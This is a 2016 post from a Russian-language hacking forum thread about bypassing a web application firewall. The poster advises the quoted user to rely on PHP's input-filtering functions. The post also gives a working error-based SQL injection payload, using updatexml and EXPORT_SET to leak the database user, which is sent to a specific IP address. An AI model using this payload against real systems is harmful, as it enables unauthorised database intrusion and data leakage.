Тема: ByPass WAF
Показать сообщение отдельно

  #7  
Старый 16.02.2016, 17:29
psihoz26
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806

Репутация: 324


По умолчанию

Цитата:
Сообщение от Filipp  

Мда.. Ну, понятно.. Фильтрация дерьмо. Ладно, спасибо.. Придумаю что-то покруче.
не изобретайте велосипед в пхп есть куча функций нормально отфильтрующих юзеринпут

Код:
URL: http://185.86.76.169/
POST DATA: sql=qwe'||updatexml(1,EXPORT_SET(1,':',user(),'',2),1)||'
а вот то-что MySQL из под root это вообще беда.
 
Ответить с цитированием